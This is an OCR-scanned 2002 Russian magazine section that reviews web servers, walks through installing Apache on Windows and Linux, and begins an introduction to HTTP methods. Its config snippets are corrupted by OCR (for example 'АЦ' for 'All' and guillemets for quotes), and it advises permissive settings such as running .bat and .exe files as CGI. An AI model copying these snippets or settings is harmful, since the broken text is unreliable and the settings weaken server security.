ссылками на сайты их производителей. Ну, поехали потихонечку. 


Начали мы с него не случайно. Это сервер начального уровня, а значит, 
вполне подойдет начинающим сайтостроителям. Кроме того, этот сервер 
входит в состав Windows 98, NT4 и IIS (собственно, и является урезанной 
версией этого сервера). В его возможности входит поддержка CGI, хотя и 
довольно слабая, Internet Database Connector (IDC), Active Server Pages 
(ASP), интерфейс прикладного программирования сервера (ISAPI), a так- 
же компонент WebBoots для обслуживания страниц с помощью программы 
Front Раде. Насчет последнего, а именно что касается FrontPage, то PWS во- 
обще тесно с ним интегрирован. То есть все создано так, чтобы освободить 
тебя от повседневной вебдизайнерской рутины: наваял сайт, оттестил его 
в локальном режиме на своей тачке и отправил прямехонько на сервер. 
Никаких лишних утилит и манипуляций, все просто, как строевая подготов- 
ка. Так что можешь уделить все время непосредственно дизайну, осталь- 
ное за тебя сделают программы. Главное только их настроить, что тоже не 
составит особого труда даже для новичка. К сожалению, этот сервачок об- 
ладает весьма скромным набором функций, не поддерживает скриптовые 
языки вроде Perl и РНР и не подойдет для ваяния чего-то особо наворо- 
ченного, да и уровень безопасности оставляет желать лучшего. Кроме то- 
ro, ис FTP придется обломаться - PWS его тоже не поддерживает. Так что, 
если ты только учишься и не хочешь сильно париться с укрощением софта 
или нужно просто создать простенький сайт с десятком страничек, то PWS 
тебе пока что хватит. Его же хватит и для того, чтобы просто протестить 
сайт на своем компьютере или в твоей домашней сетке без установки и на- 
стройки тяжеловооруженного сервера. 

Искать свежий и бесплатный дистрибутив нужно на www.microsoft.com. 


Был создан для того, чтобы расширить возможности WinNT Server, и, собст- 
венно, его вторая версия входит в состав NT 4.0. На настоящий момент до- 
ступна 5 версия сервера. Он поддерживает службы \/А/М, Gopher u FTP. Име- 
ет средство администрирования IIS Internet Service Manager, с помощью ко- 
торого ты можешь управлять сервером как локально, так и удаленно. А так- 
же работает с технологиями CGI, ASP, IDC и Т5АРТ. У этого сервера хорошо ус- 
троена система безопасности. Протокол безопасных соединений SSL (Secure 
Sockets Layer) и TSL обеспечивают безопасный обмен данными между кли- 
ентами и серверами и обеспечивают способ проверки клиентов сервером до 
подключения пользователя к серверу. Сертификаты клиентов позволяют 
программистам отслеживать пользователей узлов. Кроме то- 

го, ты сможешь управлять доступом к системным ресурсам 

на основе сертификата клиента. Ограничения по ТР-адресам 

позволяют разрешать и запрещать доступ как отдельным 

компьютерам, так и группам и целым доменам. 


034 september/09/2002 
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ВЫБИРАЕМ WEB-CEPBEP 
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IIS интегрирован с протоколом проверки подлинности Kerberos v5, реали- 
зованным в Windows 2000. Он позволяет передавать сведения, подтверж- 
дающие подлинность пользователя, между компьютерами в сети, которые 
работают под окнами. Причем настроить безопасность твоего сервера те- 
бе помогут различные мастера, что здорово облегчает работу. 

В администрировании этот сервер также предоставляет широкие воз- 
можности. Ты полностью контролируешь системные процессы (ASP, 
ISAPI, CGI и прочие), управляешь ими и, в случае неправильной работы 
одного из процессов, можешь перезапустить только один этот процесс, 
а не весь сервер, да и если с самим сервером случился полный кирдык, 
то можно перезапустить его без перезагрузки компьютера. Все почти 
как B Win2000/XP. 

Кроме того, 115 позволяет выделить различные права даже ANA админист- 
раторов. То есть, если ты не один админишь свой сервер, а поручил от- 
дельные задачи еще кому-то, но не хочешь, чтобы он вмешивался в твои, 
можно определить для него соответствующие права. Службы терминала, 
входящие в набор возможностей 115, позволяют запускать программы на 
сервере с любого компьютера, причем работающего под любой, отличной 
от Windows осью. 

Сервер поддерживает сжатие НТТР, что ускоряет загрузку страниц и фай- 
лов на клиентские машины. А ЕТР позволяет докачивать файлы после пре- 
рывания загрузки. 

За свежей копией все туда же - на Www.microsoft.com. 


АРАСНЕ 

Это ведущий сервер для Unix/Linux и ему подобных платформ. Соответст- 
венно, один из самых надежных серверов. Он, так же как и многие про- 
граммы под nix, распространяется бесплатно и с исходниками, которые ты 
можешь, если тебя что-то не устраивает, изменить и откомпилировать по- 
своему. Apache, как правило, входит в дистрибутив различных версий 
Linux. Есть, правда, и коммерческие версии сервера - Apache-SSL и 
Stronghold, которые отличаются лишь улучшенной защитой с применени- 
ем технологии SSL и расширенными инструментами администрирования. 
Собственно, если ты не никсоид и с пингвином не братаешься, то можешь 
скачать версию под Windows и даже под 05/2 (для особых извращенцев). 
Особые любители экзотики, вроде Amiga, могут найти версию и для нее. 
Однако, как ты, наверное, знаешь, то, что создавалось под nix, лучше все- 
го для него и использовать, так как версии для других осей могут функци- 
онировать чуть хуже или с некоторыми ограничениями. Также и с Apache 
- под Windows он работает менее шустро, чем под nix. Да и в его внутрен- 
ностях не особо покопаешься. Тем не менее, ничто не мешает тебе исполь- 
зовать Apache под Windows, если ты согласен смириться с этими ограниче- 
НИЯМи. 

Если ты встал на охотничью тропу краснокожих, то тут тебе открывается 
богатый набор разнообразных возможностей. Напомню тебе, что все са- 


ть 
“yf 


a: 


мые популярные программные средства WEB, такие как Perl, PHP, Phyton и 
некоторые другие, и были разработаны прежде всего для Nix и, в частнос- 
ти, для сервера Apache. В нем существует также и поддержка сервлетов 
Java - Apache JServ, которая позволит тебе управлять АРТ функциями язы- 
ка Java. Для Apache существует множество дополнительных модулей, ко- 
торые можно скачать с сайта разработчика или даже создать свои собст- 
венные, чем большинство кодеров и занимается. Исходя из всего этого, 
Apache, пожалуй, самый лучший выбор, если ты собрался ставить универ- 
сальный web-cepBep, поддерживающий все современные технологии. 
(Сайт, соответственно: www.apache.org. Дополнительную инфу, модули и вер- 
сии для других осей можешь искать по следующим адресам: apache.inf.ru, 
www.apache.org/docs/windows.html, www.slink.com/Apache0S2, 
www.dsdelft.nl/~apache. 


RUSSIAN APACHE 

Вот как раз и один из примеров изменения кода популярного web-cep- 
вера. Можно было бы и не упоминать его в нашем обзоре, так как это, 
по сути, тот же самый Apache, но, я думаю, тебе стоит знать и об этой 
модификации. Сторонние разработчики столкнулись с проблемой гра- 
мотного понимания краснокожим кириллических шрифтов, решили 
слегка переделать его исходный код, благо, как я уже говорил, Апач по- 
ставляется с исходниками. И в результате мы имеем полнофункцио- 
нальный Apache, но понимающий одновременно несколько кодировок 
кириллицы. Достать можешь тут: apache.lexa.ru. Там же найдешь до- 
полнения, обновления и всяческую документацию и советы по уста- 
новке и использованию. 


JIGSAW 

Этот сервачок написан Ha языке Java. Разработчики стремились создать 
мобильный и расширяемый web-cepBep. Работает на большинстве систем, 
которые поддерживают Java, то есть подойдет для всех видов окон и 
nix’ op. Возможности Jigsaw ты можешь расширить путем написания но- 
вых модулей Java. Также для этого можно применять и CGI. Переноси- 
мость - это основное преимущество Jigsaw перед остальными, не придет- 
ся особо париться по поводу того, какое у тебя железо, какая ось и какие 
программные средства ты собираешься использовать. 

Jigsaw - это объектно-ориентированный сервер. Каждый его ресурс явля- 
ется объектом Java и может независимо конфигурироваться. Основные 
компоненты - это модуль демона, отвечающий за протокол НТТР, и модуль 
ресурсов, отвечающий за управление информационными ресурсами сер- 
вера. Но из-за того, что этот сервер так привязан к Яве, то, прежде чем его 
поставить, тебе придется установить среду выполнения Java - Java 2 SDK 
или Sun Java 2 Runtime Environment. Приготовься грузить это добро от- 
дельно. 

Cam сервер можно взять тут: WWW.W3.0rg, а все эти Зауа-навороты тут: 
java.sun.com. Вот такой вот геморройчик. 

Администрировать сайт можно так же, как и многие другие, с помощью 
прилагаемой утилиты администрирования, которая называется JigAdmin. 


ВЫБИРАЕМ WEB-CEPBEP 


NCSA HTTPD FOR WINDOWS 


Большой и сложный пакет, хотя и легко ставящийся. По своим возможно- 
стям он похож на мощные Ип1х-серверы. Но этот сервер имеет весьма зна- 
чительные ограничения, например, одновременно получить доступ к доку- 
ментам в его корне могут только 8 пользователей. Так что этот сервер по- 
дойдет для небольшого корпоративного сайта или информационного и 
файлового ресурса в твоей домашней сетке. К сожалению, разработчики 
давно уже прекратили техническую поддержку этого сервера, так что об- 
новлений ждать не приходится. 


ORACLE WEB APPLICATION SERVER 

Надеюсь, ты слышал о базе данных Oracle. Так вот, этот сервер был разрабо- 
тан той же конторой и специально для создания меБ-приложений, использу- 
ющих базу данных и прочие продукты Oracle, и полностью с ней интегрирует- 
ся. Но ничто не мешает использовать его как обычный web-cepBep. Причем, 
очень надежный в плане секьюрности и гибкий в настройках - еще бы, если 
его делали для работы с БД! Он поддерживает высокий уровень криптозащи- 
ты данных. А гибкость и независимость настроек параметров позволяет под- 
держивать всевозможные конфигурации сети, что расширяет область приме- 
нения этого сервера. Ты можешь замутить на его основе как обычный сайт, 
так и навороченную информационную систему и базу данных. 

Сайт разработчика по этому адресу: www.oracle.com 


WEBSITE 

Вот так вот просто и незатейливо называется продукт совместной работы 
известного издательства OReilly &Associates и фирмы Enterprise 
Integration Technologies. Продукт этот коммерческий и работает под 
Windows. В нем хорошо реализована функция криптозащиты данных на 
базе протокола S-HTTP, а механизм ISAPI обеспечивает доступ к базам 
данных. Собственно, ничего особо выдающегося больше нет. Можешь по- 
читать на сайте разработчика: website.ora.com и software.ora.com. 


ЧТО ВЫБРАТЬ? 

Решать, конечно же, тебе, что выбрать. Практика показывает, что боль- 
шинство предпочитает использовать Apache и IIS, но ведь они не единст- 
венные; может, ты захочешь посмотреть на другие серверы, если эти два 
гиганта тебя чем-то не устраивают. Я тебе могу только посоветовать, чем 
нужно руководствоваться при выборе сервера. Определись, что будет 
представлять собой твой проект - простенький хоумпейдж? Тогда выбирай 
что попроще и не парься. Красивый и навороченный проект? Тогда что-то 
такое, что позволит выполнить именно эту задачу. А уж если решил заму- 
тить информационный корпоративный ресурс с кучей инфы, базами дан- 
ных и различными уровнями доступа, тогда, скорее всего, понадобится 
что-то тяжеловооруженное и, возможно, даже не бесплатное - безопас- 
ность и надежность тоже немаловажный вопрос. Далее определись с 
платформой и осью, на которой будешь ваять. Обрати внимание на ско- 
рость соединения, мощность тачки и на какую посещаемость ты рассчиты- 
ваешь - разные серверы по-разному жрут системные ресурсы и обладают 
своими ограничениями на количество одновременно работающих пользо- 
вателей, не загнется ли выбранный тобой сервер при тех или иных ситуа- 
циях. Также не забудь и о том, какие языки и технологии ты собираешься 
использовать. Не все серверы одинаково хорошо поддерживают те или 
иные технологии, а некоторые вообще могут не поддерживать какой-то 
определенный язык. Стоит подумать и о переносимости твоего сайта на 
другие системы: вдруг ты захочешь поменять лошадку, а то, что ты ваял, 
окажется несовместимым или плохо совместимым с другими. Вот некото- 
рый перечень тех вопросов, которые ты должен учитывать. 

Удачи, амиго! Почаще читай bugtraq и вовремя ставь заплатки на свой 
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APACHE ПОД WINDOWS 


Такой подзаголовок наверняка вызовет ухмылку у всех серьезных вебди- 
зайнеров и линуксойдов. Зачем кому-то понадобилось ставить Apache под 
виндами, когда он создан для Unix и будет наиболее эффективен именно на 
п1х-системах? Да и ктому же под винду его надо ставить отдельно, в то вре- 
мя как большинство дистрибутивов Linux уже содержит Apache — остает- 
ся только настроить ero. Не беда, про Linux мы поговорим позже, а этот раз- 
дел будет полезен тем, кто по каким-либо причинам не хочет связываться с 
Ипих или кому нужно просто протестировать свой сайт на домашнем ком- 
пьютере, прежде чем залить его на сервер. Начнем с установки. Дистрибу- 
тив можно найти как на официальном сайте — www.apache.org, так и, на- 
пример, тут: http://www.dizain.ru/dklab/dis/apache_setup.exe. В конце 
концов, найдешь его где-нибудь на Митино-базаре. При установке советую 
изменить путь по умолчанию на что-то более понятное и близкое к приня- 
тым на web стандартам: c:\usr\local\apache. Так будет удобней, и ты сам 
поймешь, почему, когда серьезно займешься умеБ-коддингом. Именно на 
этот путь тебе часто придется ссылаться в своей работе. Я использовал вер- 
сию 2.0.35, но если у тебя другая, то не беспокойся — я тебе буду объяс- 
нять так, что, по идее, должно подойти к любой версии. 

Во время установки тебе, скорее всего (смотря какая версия), предложат 
ввести имя домена (domain name), имя сайта (site name) и почтовый адрес. 
Если ты ставишь сервер, к которому должен быть доступ с любого компа в 
Интернете, то тогда вводи зарегистрированные на тебя данные. Если же ты 
ставишь Apache на своем домашнем компьютере и планируешь всего лишь 
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тестировать Ha нем свои странички перед загрузкой на реальный сервер, 
советую ввести такие данные: имя домена — localhost, имя сайта — любое, 
например, vasyapupkin (ни www, ни «точкару» можешь не указывать), или 
твой ТР, ну, а мыло можешь ввести и реальное. Главное заполнить все три 
поля, в крайнем случае, изменишь эти данные потом. 

После установки (если ставишь под Win2000/XP, можно и не перезагружать- 
ся) запусти браузер и введи в адресной строке имя домена или имя сайта, 
которые ты задал при установке (в нашем примере это localhost либо vasya- 
pupkin) — если все правильно, то ты должен увидеть стартовую страницу 
сервера Apache, как на скриншоте. А в системном трее должен появиться 
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В предыдущей статье мы рассказали тебе о том, 
какие \меб-серверы существуют в природе. А теперь 
пришло время поговорить о том, как поставить и 
настроить меб-сервер. К сожалению, объем статьи не 
позволяет рассказать тебе про установку хотя бы 
всех тех серверов, про которые мы рассказали тебе в 
предыдущей статье, поэтому ограничимся самым 
популярным сервером - Apache - и а тебя 
ЕЕ и настраивать его под Linux и Windows. 


В отличие даже от того же IIS, который, начиная с 5 
версии, входит в состав Windows 2000 и ХР 
Professional/Server (в XP Home Edition - не входит), а, 
следовательно, бесплатно и отдельно ты его уже не 
получишь. Да и разобраться с IIS намного проще. 
Короче, приступим. 


значок: красное перо с зеленой стрелочкой в кружочке — означает, что 
сервер запущен. Теперь он будет грузиться вместе с Windows. Но если у те- 
бя другая версия и она не грузится вместе с Windows, тогда поищи ее в ме- 
нюшках «Пуск->Программы...» и т.д. Там будут какие-нибудь опции вроде 
Start, Stop, Restart или нечто подобное. Надеюсь, ты сам разберешься, как 
запускать, останавливать и рестартить сервер (значки говорят за себя). 


Теперь можно перейти к настройке сервера. Открой файл 
c:\usr\local\apache\conf\mime.types, найди в этом файле строку 
«text/html htm» и допиши в ее конец «shtml shtm sht». Далее открывай фа- 
ил c:\usr\local\apache\conf\httpd.conf. В нем найди строку «ServerAdmin». 
Там должен быть указан твой мыльник, который ты вводил при установке. 
Если при установке тебе не предлагалось ничего вводить (или ты решил по- 
менять адрес), то можешь вписать его сейчас — именно этот адрес будет 
светиться в браузере в случае ошибки, и именно на него тебе смогут сооб- 
щить о баге посетители твоего сайта. Чуть ниже должна быть строка 
«ServerName». Опять же, если тебе предлагалось ввести имя сервера при 
установке (в нашем примере vasyapupkin), то там должно быть нечто вроде 
vasyapupkin:80. После двоеточия, если ты еще не понял, указан стандарт- 
ный для протокола http номер порта — 80 (или 8080). Если при установке 
тебе не предлагалось ничего вводить, тогда эта строка может быть заком- 
ментирована символом #. Если так, то убери этот символ и допиши туда имя 
сервера и 80-й порт после двоеточия. В качестве имени сервера можно на- 
писать и просто IP адрес твоей тачки (если ты в сети). Теперь нужно ука- 
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зать каталог, где будут храниться файлы твоей страницы. Про это написано 
в строке «DocumentRoot». В моей версии там был указан такой путь: 
«C:/usr/local/Apache/htdocs», именно там хранились файлы, позволяющие 
грузить ту самую стартовую страницу, которую ты видишь на скриншоте. 
Собственно, неважно, какой там записан путь и записан ли он вообще в тво- 
ей версии (если там ничего нет, то, наверное, и стартовой страницы ты бы 
не увидел), ты можешь написать там свой путь, например, «c:/www» (реко- 
мендую задать именно такой путь, чтобы во многом облегчить свой даль- 
нейший труд). Разумеется, не забудь создать этот каталог и поместить туда 
файлы твоего сайта. Эти страницы будут доступны по адресу 
http://<umMa_cepBepa>. 

Ниже, после комментариев, идет блок, начинающийся с «<Directory/>» и 3a- 
канчивающийся Ha «</Directory>». Замени его содержимое на 
<Directory/> 

Options Indexes Includes 

AllowOverride АЦ 

</Directory> 

Далее следует похожий блок, начинающийся и заканчивающийся такими 
же строчками. Отредактируй его так, не обращая внимания на обильные 
комментарии. 

<Directory «c:/www»> 

Options Indexes Includes 

AllowOverride АЦ 

Order allow,deny 

Allow from all 

</Directory> 

Да, в самом начале указывай свой каталог для страниц соответственно, так 
же как вводил и в прошлый раз. В нашем примере — это «c:/Wwww». 
Теперь настроим каталог, в котором, по идее, должны храниться пользова- 
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тельские меБ-странички. Даже если ты используешь его для тестирования 
только своего сайта на своей домашней тачке, все равно Apache требует на- 
стройки этого параметра. Делаем это так. После всей той шняги, которую 
мы только что вводили, найди такую строку: «UserDir», и напиши в ней что- 
нибудь типа «c:/home», не забыв предварительно создать такой каталог на 
своем винте. Эти страницы будут доступны по адресу НЕр://<имя_серве- 
ра>/-<имя_пользователя>/. 

Следующая строка — «DirectoryIndex». Если в ней написано «index.html 
index.htm», то оставь как есть, в противном случае отредактируй ее до это- 
го состояния. Это означает, что титульная страница твоего сайта имеет та- 
кое название файла (так принято по умолчанию, если в адресной строке 
браузера не указывают точное название документа), и именно она и будет 
загружаться в браузере в первую очередь. 

Едем дальше. Создадим, например, в корне диска С: (как ты мог заметить, для 
примера мы создаем все папки в корне диска С: и указываем соответствующие 
пути, но впоследствии ты можешь делать по-своему) папку под названием cgi- 
bin, где у нас будут лежать Сб]-скрипты, и пропишем это. Ищем строку 
«ScriptAlias» и приводим ее к такому виду: «ScriptAlias /cgi-bin/ «c:/cgi- 
bin/»». Сразу после этого, после комментариев, идет блок, KOTO- 

рый следует привести к такому виду: 

<Directory «c:/cgi-bin»> 

AllowOverride АЦ 

Options ExecCGI 
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</Directory> 

Найди строку «AddHandler cgi-script», которая может быть закомментиро- 
вана. Раскомментируй ее. В ней, скорее всего, уже написано «.cgi», если 
это не так, то допиши это. Также можно дописать «.bat» и «.ехе», что поз- 
волит запускать эти типы файлов (пригодится нам для проверки). В общем, 
это покатит разве что для Windows, так как nix не понимают эти файлы, — 
используй лучше реальные с91-скрипты, если хочешь полной совместимос- 
ти со всеми осями. 

Если тебе требуется работа с виртуальными хостами, например, если тебе 
надо установить несколько виртуальных доменов, или ты работаешь сразу 
над несколькими сайтами, то настраивай это следующим образом. В ката- 
логе, который мы создавали для пользовательских страниц (c:\home), со- 
здай каталог с именем виртуального хоста, пускай это будет host1. А в нем 
так же отведите каталог для страниц, пусть это будет c:\home\host1\www и 
c:\home\host1\cgi-bin. Tenepb открывай файл 
c:\usr\local\apache\conf\httpd.conf и в его конец дописывай: 
NameVirtualHost host1 

<VirtualHost host1> 

ServerAdmin <твои_майл> 

DocumentRoot c:/home/host1/www 

ServerName host1 

ErrorLog logs/error.log 

CustomLog logs/access.log common 

ScriptAlias /cgi-bin/ «c:/home/host1/cgi-bin/» 

</VirtualHost> 

Таким образом можно создать сколько угодно виртуальных хостов с одним 
ТР и разными именами. 

Осталось теперь проверить сервер. Запусти сервер (моя версия грузится 
вместе с Windows), как описывалось в начале статьи, если он не запущен, 
или, если запущен, TO на всякий случай сделай Restart. Если сервер не за- 
пустился, посмотри логии, которые находятся в файлах error.log и 
access.log в c:\usr\local\apache\logs и проверь все еще раз. В каталоге, ко- 
торый мы отвели под страницы (c:\www), создай файл index.htm (с любым 
содержанием), набери в браузере http://<mma сервера> (можно набрать 
http://localhost, если ты работаешь не в сети); если ты сделал все правиль- 
но, ты увидишь свой файл index.htm. Чтобы проверить CGI, создай в отве- 
денном под CGI каталоге (c:\cgi-bin) файл test.bat такого содержания: 
@echo off 

echo Content-type: text/html 

echo. 

echo. 

Dir 

Затем в браузере введи http://<uma ceppepa>/cgi-bin/test.bat. Если все 
прошло успешно, то ты увидишь результат выполнения команды DOS — dir. 
Хотя бывает, что Apache не может запустить Ба{-файл и выдает его содер- 
_ жимое, в этом случае проверить работу Сб1-скриптов ты сможешь только 
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после установки Perl. 

Таким же образом можно проверить и виртуальные хосты, если ты их со- 
здал, только будь внимателен с путями. 

Собственно, вот и все. Apache под Windows установлен и готов к работе. Te- 
перь ты сможешь добавлять к нему различные примочки вроде Perl или 
MySql. Но это тема уже для другой статьи. 


APACHE/RUSSIAN APACHE ПОД LINUX 

Настройка Apache nog Linux в чем-то сходна с настройкой описанной вы- 
ше версии. И пусть тебя не смущает слово «Russian» в названии — это пол- 
ноценный Apache, только адаптированная к грамотному восприятию рус- 
ских кодировок версия. Так что можно порекомендовать даже ставить 
именно эту версию (тем более, если в твой Linux не входит сервер Apache). 
Свежий дистрибутив Russian Apache ты найдешь на www.apache.lexa.ru, a 
оригинальный Apache, соответственно, на Www.apache.org . Устанавливай 
его командой tar xvzf apache_X.X.XrusPLXX.X.tar.gz. Стоит заметить, что 
первые три «Х», которые я написал в имени файла, соответствуют ориги- 
нальной версии Apache, а последние три «Х» — номеру русского модуля 
(не забудь вписать вместо этого имя скачанного тобой файла). Если ты ска- 
чал оригинальный Apache, то, разумеется, указывай ero имя файла. После 
этой команды входим в созданный после распаковки каталог (такой же, 
как и имя файла) и запускаем: 

cd <имя_каталога_с_распакованным_Арасне> 

./configure. 

Когда указанная операция будет выполнена, задай команды make и make 
install: 

make 

make install. 

Apache установится в /usr/Llocal/apache, после чего следует настроить фай- 
лы httpd.conf, access.conf и srm.conf в каталоге /usr/local/apache/etc/ 
(или /usr/local/apache/conf), если, конечно, при установке ты не задал 
другой каталог. Эти действия сходны с теми, что мы делали и для Apache 
под Windows, но с той разницей, что в той версии все эти настройки нахо- 
дились в одном файле — httpd.conf, а не в трех разных. Соответственно, 
примерно так же и нужно будет настраивать в этот раз. 

Начнем с файла access.conf, в котором содержатся директивы доступа к 
файлам и каталогам сервера. По умолчанию страницы твоего сайта хранят- 
ся в каталоге /usr/local/apache/share/htdocs, но удобней было бы разме- 
щать их примерно так: /www/<umA_cepBepa>/, чтобы не запутаться. 
Базовый вариант файла access.conf может быть таким: 

## access.conf — Apache HTTP server configuration file 

Ht 

# access.conf: Global access configuration 

# Online docs at http://www.apache.org/ 


<Directory /> 

Options FollowSymLinks 
AllowOverride None 
</Directory> 


<Directory /www> 

Options All 

AllowOverride All 

order allow,deny 

allow from all 

</Directory> 

# You may place any other directories or locations you wish to have access 
information for after this one. 

В этом примере мы задали полный доступ с любого узла к документам, xpa- 
нящимся в каталоге /www. Соответственно, не забудь создать такой каталог 
и поместить туда файлы твоего сайта. Нечто похожее мы проделывали в 
файле httpd.conf для Apache под Windows — смотри в начале статьи. 
Теперь настроим файл srm.conf. Он отвечает за настройки структуры каталогов 
сервера. В нем достаточно внести следующие изменения. Найди в нем строку 
«DocumentRoot» и укажи в ней путь к каталогу, где у тебя лежат файлы твоего 
сайта. В нашем примере (см. настройки для access.conf) это /www, значит, 
строка примет вид: «DocumentRoot /www». Далее укажем путь к каталогу, где 
будут храниться страницы пользователей. Это находится в строке «UserDir. 


Как и в прошлый раз, создадим каталог /home и изменим строку так: «UserDir 
/home». После этого укажи начальную страницу, которая будет грузиться ав- 
томатически при входе на твой сайт. Делай это так: «DirectoryIndex index.html 
index.htm». При этом будут загружаться указанные файлы. 

Здесь же нужно настроить запуск CGI/Perl скриптов. Для этого убираем 
значки комментариев (если они есть) перед строками «ScriptAlias» и 
«AddHandler cgi-script .cgi». В последней, после опции «.cgi», можно допи- 
сать «.pl», что позволит обрабатывать еще и файлы с расширением pl. 
Осталось теперь настроить только файл httpd.conf. В нем находятся основ- 
ные настройки сервера. Укажи в нем домен (имя сервера или IP) и почто- 
вый адрес, на который тебе смогут отправить сообщение, если сервер нач- 
нет глючить. Указать это можно в строках «ServerName» и «ServerAdmin». 
Так же можешь настроить и виртуальные хосты. Причем, они могут разли- 
чаться либо по ТР-адресам, либо по именам. Второй случай будет предпо- 
чтительней, если у тебя всего один ТР или ты не можешь выделять другие 
IP для web-cepBepos. Вот тебе пример настройки для виртуальных хостов 
с разными ТР и разными именами (не забудь правильно указывать пути и 
создавать каталоги): 


ServerName www.myserv1.net 


<VirtualHost 192.168.1.20> 

DocumentRoot /www/myserv1.net 

ServerName www.myserv1.net 

ErrorLog /var/log/error_log.myservi.net 

CustomLog /var/log/access_log.myservi.net combined 
ScriptAlias /cgi-bin/ «/home/host1/cgi-bin/» 


</VirtualHost> 


<VirtualHost 192.168.1.21> 

DocumentRoot /www/myserv2.ru 

ServerName www.myserv2.ru 

ErrorLog /var/log/error_log.myserv2.net 

CustomLog /var/log/access_log.myserv2.net combined 
ScriptAlias /cgi-bin/ «/home/host1/cgi-bin/» 


</VirtualHost> 
А это для виртуальных хостов с разными именами, но одним IP: 


ServerName www.myserv1.net 
NameVirtualHost 192.168.1.20 


<VirtualHost 192.168.1.20> 

DocumentRoot /www/myserv1.net 

ServerName www.myserv1.net 

ErrorLog /var/log/error_log.myservi.net 
CustomLog /var/log/access_log.myserv1 combined 
ScriptAlias /cgi-bin/ «/home/host1/cgi-bin/» 


</VirtualHost> 


<VirtualHost 192.168.1.20> 

DocumentRoot /www/myserv2.net 

ServerName myserv2.net 

ServerAlias *.myserv2.net 

ErrorLog /var/log/error_log.myserv2.net 
CustomLog /var/log/access_log.myserv2 combined 
ScriptAlias /cgi-bin/ «/home/host1/cgi-bin/» 


</VirtualHost> 


Все это будет актуально и при работе с виндовой версией Apache, с кото- 
рой мы разбирались вначале. 

Теперь ты можешь запустить сервер: /usr/local/apache/sbin/apachectl start 
(начиная с версии Russian Apahe 27.4 — /usr/local/apache/bin/apachectl 
start). Если ты поставил Apache в другой каталог или твоя версия не совпа- 
дает с нашей и ставится в другой каталог, тогда, соответственно, указывай 
свой путь. Если ты что-то не так настроил и сервер не запускается, то ты 
увидишь сообщения об ошибках либо посмотри в логах — это файлы 
error_log и access_log в каталоге logs. 

Проверить работоспособность сервера и виртуальных хостов ты можешь 
точно так же, как мы описали проверку Apache под Windows, 3a исключени- 
ем проверки CGI с помощью Ба*-файлов — тутты можешь это сделать толь- 
ко после установки Perl, так как, сам знаешь, в Linux батники не катят. 


ФИНИШ 

Итак, теперь ты умеешь устанавливать и настраивать Apache как под винду, так 
и под линух. Как видишь, все не так сложно. К сожалению, это всего лишь ба- 
зовая конфигурация, и мы не можем рассказать тебе все тонкости настройки 
из-за ограниченности журнального пространства. Но ты и сам можешь поко- 
выряться в конфигурационных файлах, почитать комментарии (правда, на ан- 
глийском) и все освоить. А если что, почитай советы в Инете или в книгах, бла- 
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ТРЕПАНАЦЫЯ 
ПРОТОНОПА: HTTP 


Знаешь, что означает эта грозная аббревиатура? А, знаешь, 
как работает этот протокол? Нет? Ну и хорошо, потому как 
не каждый же должен уметь с паяльником в руках 
ковыряться в своем телевизоре, вместо того чтобы его 
смотреть. Так и ты, неоднократно вводя в адресной строке 
своего браузера, эти заветные буквицы «http://www...» 
наверное, и не задумывался об их предназначении - слепо 
следуя чьей-то прихоти. Но, бывают моменты, когда все-таки 
приходится обращаться к основам НТТР, например, при 
программировании для интернета. 


Ильдар Валитов (ildar@arat.ru) 


ВСКРЫТИЕ ПОКАЗАЛО... 


HTTP (НурегТехЕ Transfer Protocol) дословно переводится, как протокол 
передачи гипертекста. НТТР - прикладной протокол (обеспечивает работу 
определенных приложений: веб-браузера и веб-сервера). Схема работы — 
клиент-серверная. Клиент отсылает запрос, содержащий заголовок 
запроса. Сервер шлет на это ответ, который состоит из заголовка и данных 
(в данных содержится как раз то, что запрашивал клиент: веб-страница, 
какая-нибудь картинка или что-то еще). 

Все это происходит в несколько этапов: 

1. Клиент связывается с серваком. 

2. Клиент запрашивает ресурс с сервака (НТМ!-файл, например) 
посредством одного из НТТР-методов (0 них - чуть позже). 

3. Сервер посылает ответ, в котором содержится заголовок ответа 
(включающий код состояния НТТР) и сами данные. 

4. Сервер закрывает соединение. 

Так качается один файл (НТМ!-страница, графический файл etc). Для 
скачки каждого нового файла необходимо заново пройти все этапы 
соединения. Например, если браузер получил таким образом НТМЕ-код 
странички, адрес которой ввел пользователь, и увидел, что в теле HTML есть 
ссылки на картинки, он, чтобы грамотно построить всю НТМЕ-страницу и 
показать ее юзеру, должен связаться с серваком п-ное количество раз и 
скачать все необходимые картинки. 


РАСКЛАДЫВАЕМ КОСТОЧКИ ПО ПОЛОЧКАМ 


Так что же это за НТТР-методы такие? Все очень просто: пользуясь 
определенными методами, клиент говорит серваку, что именно он хочет 
сделать. Методов несколько, сейчас мы с ними познакомимся: 


1. GET -— с помощью этого метода клиент сообщает серверу, что он хочет, 
чтоб сервак прислал ему такой-то файл. Для наглядности давай запустим 
телнет и попробуем проделать все ручками: 


telnet u121.narod.ru 80 


В окне терминала мигает символ подчеркивания («_») — это означает, что 
сервер ждет запросов от клиента. Ок, Дадим ему запрос: 


GET /index.html HTTP/1.1 
HOST: u121.narod.ru 


Ha это OH нам послушно выдаст index.html. 


Если попросим какую-нибудь картинку (GET /img/girl.jpg HTTP/1.1) - 
выдаст и картинку :). 
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2. HEAD — с помощью этого метода клиент сообщает серверу, что он хочет, 
чтоб сервер прислал ему хедер о таком-то файле (только хедер, без самого 
файла!). Попробуем? Вводим: 


telnet u121.narod.ru 80 


HEAD /index.html HTTP/1.1 
HOST: u121.narod.ru 


Видишь, самого файла нет — только его описание. 


3. POST - с помощью этого метода клиент сообщает серверу, что он хочет 
передать серверу какие-то данные (например, параметры для с91-скрипта). 
C помощью этого метода на сервер отсылаются данные из НТМ!-форм. 

4. РОТ - с помощью этого метода клиент сообщает серверу, что он хочет 
передать серверу какие-то данные и чтоб тот сохранил их в таком-то 
файле. Понятное дело, все админы это дело зарубают на корню, а то бы 
дефейсили все, кому не лень. 

5. DELETE - с помощью этого метода клиент сообщает серверу, что он хочет, 
чтоб сервер удалил такой-то файл. Ммм, a еще чего :)? 

6. TRACE - трассировка, используется для тестирования работы сети. 
Подразумевается, что содержимое запроса будет возвращено неизменным. 


Вместе с реализуемыми методами при отсылке на сервер и при получении 
ответа от сервера в заголовок запроса может включаться большое 
количество стандартных полей, которые дополняют, делают более гибким 
сам запрос и ответ. Одни дают более подробную информацию о клиенте. 
Поля заголовков HTTP условно делятся на поля общих заголовков (general- 
header fields), заголовков запроса (request-header fields) и заголовков 
ответа (response-header fields). Синтаксис полей следующий: 

<название поля> ; <значение поля> 
Ниже перечислены в алфавитном порядке названия полей, всех трех типов 
